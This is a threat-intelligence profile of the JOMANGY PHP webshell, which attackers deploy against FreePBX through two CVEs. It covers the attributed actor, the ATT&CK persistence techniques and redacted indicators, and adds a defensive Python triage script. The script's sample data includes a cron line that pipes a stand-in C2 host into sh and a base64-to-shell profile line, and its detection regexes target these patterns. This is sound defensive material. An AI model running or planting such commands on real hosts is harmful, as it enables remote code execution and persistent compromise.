Mallory
Malware | Used by 1 actor | Exploits 2 CVEs

JOMANGY

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

2 CVEs
CVE-2025-64328 | OS Command Injection in Sangoma FreePBX Endpoint Manager Filestore Module | Exploited in the wild

Forensics point to two high-confidence flaws tracked as CVE-2025-64328 and CVE-2025-57819. Many systems remain exposed because administrators fail to apply patches promptly. | Analysts named this unique finding the JOMANGY webshell. According to the official report, “JOMANGY is a PHP webshell family with no prior public documentation”.

via security online infosecurityonline.info
CVE-2025-57819 | Unauthenticated SQL Injection and RCE in FreePBX Endpoint Manager | Exploited in the wild

Forensics point to two high-confidence flaws tracked as CVE-2025-64328 and CVE-2025-57819. Many systems remain exposed because administrators fail to apply patches promptly. | Analysts named this unique finding the JOMANGY webshell. According to the official report, “JOMANGY is a PHP webshell family with no prior public documentation”.

via security online infosecurityonline.info
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
INJ3CTOR3

Analysts named this unique finding the JOMANGY webshell. According to the official report, “JOMANGY is a PHP webshell family with no prior public documentation”.

via security online infosecurityonline.info
MITRE ATT&CK

Techniques & procedures

17 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1190 Exploit Public-Facing Application (Evidence: 2)

Ultimately, the FreePBX exploitation campaign relies on known security loopholes for initial access. Forensics point to two high-confidence flaws tracked as CVE-2025-64328 and CVE-2025-57819.

Execution

3 techniques
T1053.003 Cron (Evidence: 2)

Specifically, the threat actor establishes six independent survival channels on infected devices. These tracks include recurring cron polling...

T1059 Command and Scripting Interpreter (Evidence: 1)

CVE-2025-64328 is a post-authentication command injection flaw in the FreePBX filestore module.

T1059.006 Python (Evidence: 1)

The sixth is a PHP executor in the FreePBX high-availability module providing privileged command execution independently of all other channels.

Persistence

6 techniques
T1037 Boot or Logon Initialization Scripts (Evidence: 1)

The second fires a re-infection payload on every root login and system reboot by injecting code into shell profile files.

T1037.004 RC Scripts (Evidence: 1)

Specifically, the threat actor establishes six independent survival channels on infected devices. These tracks include ... shell profile insertion ...

T1053.003 Cron (Evidence: 2)

Specifically, the threat actor establishes six independent survival channels on infected devices. These tracks include recurring cron polling...

T1136 Create Account (Evidence: 1)

The infection also quietly drops 18 backdoor accounts across three tiers. Nine carry full root-equivalent privileges, eight operate at the service account level, and one is injected into the FreePBX web panel database via MySQL.

T1136.001 Local Account (Evidence: 1)

Backdoor accounts newfpbx, newfpbxs and xhimax: UID-0 OS backdoor accounts created via base64-obfuscated useradd commands.

T1505.003 Web Shell (Evidence: 2)

To begin with, the core weapon in this operation is a new malware strain. Analysts named this unique finding the JOMANGY webshell. According to the official report, “JOMANGY is a PHP webshell family with no prior public documentation”.

Privilege Escalation

3 techniques
T1037 Boot or Logon Initialization Scripts (Evidence: 1)

The second fires a re-infection payload on every root login and system reboot by injecting code into shell profile files.

T1037.004 RC Scripts (Evidence: 1)

Specifically, the threat actor establishes six independent survival channels on infected devices. These tracks include ... shell profile insertion ...

T1053.003 Cron (Evidence: 2)

Specifically, the threat actor establishes six independent survival channels on infected devices. These tracks include recurring cron polling...

Stealth

3 techniques
T1027 Obfuscated Files or Information (Evidence: 2)

This hidden script uses a double-layer obfuscation scheme consisting of Base64 encoding over ROT13.

T1070 Indicator Removal (Evidence: 1)

When it executes, it aggressively cleanses the environment of other cybercriminals. For example, the payload scans for fifty distinct third-party webshell signatures. It deletes competing files... Concurrently, the code performs a self-eviction routine against its own older campaign files.

T1564.001 Hidden Files and Directories (Evidence: 1)

The third stores eight immutable crontab copies in hidden directories.

Defense Impairment

1 technique
T1222 File and Directory Permissions Modification (Evidence: 1)

The third stores eight immutable crontab copies in hidden directories, protected by a file attribute that silently blocks deletion even by root.

Discovery

2 techniques
T1057 Process Discovery (Evidence: 1)

The fourth is a process watchdog that immediately re-downloads the dropper if the beacon processes disappear.

T1083 File and Directory Discovery (Evidence: 1)

For example, the payload scans for fifty distinct third-party webshell signatures.

Command and Control

1 technique
T1071 Application Layer Protocol (Evidence: 1)

The first channel polls the attacker’s command-and-control server every one to three minutes via scheduled cron jobs.

Other

1 technique
T1562 Impair Defenses (Evidence: 1)

It deletes competing files and blocks eleven adversary control servers bidirectionally.
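The persistence traits listed above (extra UID-0 accounts under T1136.001, cron jobs polling a C2 server every one to three minutes under T1053.003/T1071, and re-infection payloads injected into shell profiles under T1037, decoded from Base64 or ROT13 per T1027) can be checked on a Linux host from plain text already collected by a triage job. The script below is an added example written for this page; it is not Mallory's code and not code from the cited report. The function names and the sample passwd, crontab and profile contents are constructed for illustration (the account name newfpbx is one of the names the page reports; the C2 host is a placeholder).

```python
"""Host triage checks for the JOMANGY-style persistence described above.

Added example, not code from the original page or from the vendor (Mallory).
It inspects text already extracted from a Linux host (passwd, crontab, shell
profiles) for three of the documented persistence traits. All sample inputs
at the bottom are constructed for illustration.
"""
import re

# Cron minute fields that fire at least every three minutes (the page states
# the C2 server is polled every one to three minutes): "*" and "*/N", N <= 3.
_FAST_CRON_MINUTE = re.compile(r"^(\*|\*/[123])$")
_DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# "base64 -d ... | sh" style decode-and-execute in a profile line.
_B64_TO_SHELL = re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba|z|da)?sh\b")
# The classic tr-based ROT13 idiom (second layer of the documented scheme).
_ROT13_TR = re.compile(r"tr\s+'?A-Za-z'?\s+'?N-ZA-Mn-za-m'?")


def extra_uid0_accounts(passwd_text):
    """Return usernames with UID 0 other than root (T1136.001)."""
    found = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 3 and parts[2] == "0" and parts[0] != "root":
            found.append(parts[0])
    return found


def fast_polling_cron_jobs(crontab_text):
    """Return cron lines that run a downloader every <= 3 minutes (T1053.003)."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields + command
        if len(fields) < 6:
            continue
        if _FAST_CRON_MINUTE.match(fields[0]) and _DOWNLOADER.search(fields[5]):
            hits.append(line)
    return hits


def decoded_payloads_in_profile(profile_text):
    """Return profile lines that decode Base64/ROT13 into a shell (T1037, T1027)."""
    hits = []
    for line in profile_text.splitlines():
        if _B64_TO_SHELL.search(line) or _ROT13_TR.search(line):
            hits.append(line.strip())
    return hits


def audit(passwd_text, crontab_text, profile_text):
    """Combine the three checks into a list of (technique, detail) findings."""
    findings = []
    for name in extra_uid0_accounts(passwd_text):
        findings.append(("T1136.001", f"UID-0 account: {name}"))
    for job in fast_polling_cron_jobs(crontab_text):
        findings.append(("T1053.003", f"fast polling cron job: {job}"))
    for line in decoded_payloads_in_profile(profile_text):
        findings.append(("T1037", f"decoded payload in shell profile: {line}"))
    return findings


# Constructed sample data (hypothetical host; the C2 host is a placeholder).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
asterisk:x:1000:1000::/var/lib/asterisk:/sbin/nologin
newfpbx:x:0:0::/root:/bin/bash
"""
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/2 * * * * curl -s http://c2-placeholder.invalid/beacon | sh
"""
SAMPLE_PROFILE = """export PATH=$PATH:/usr/local/bin
echo 'ZWNobyBoaQo=' | base64 -d | sh
"""

if __name__ == "__main__":
    for technique, detail in audit(SAMPLE_PASSWD, SAMPLE_CRONTAB, SAMPLE_PROFILE):
        print(technique, detail)
```

On a live host the three inputs would come from /etc/passwd, the root and per-user crontabs (plus /etc/cron.d), and the root profile files (.bashrc, .bash_profile, /etc/profile.d); the checks deliberately work on collected text so they can run off-box against a forensic copy. The immutable crontab copies the page describes are not covered here because the file attribute is only visible through lsattr on the original filesystem.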

INDICATORS OF COMPROMISE

IOCs tracked for this family

15 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
5 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
5 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
5 tracked

Other indicator types observed in public reporting.

Type | Value | Latest sighting
ip.v4 | (redacted; view more in app) | 1 month ago
uri | (redacted; view more in app) | 1 month ago
ip.v4 | (redacted; view more in app) | 1 month ago
uri | (redacted; view more in app) | 1 month ago
hash.sha1 | (redacted; view more in app) | 1 month ago
ip.v4 | (redacted; view more in app) | 1 month ago
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching (15)

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution (1)

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities (2)

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping (17)

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.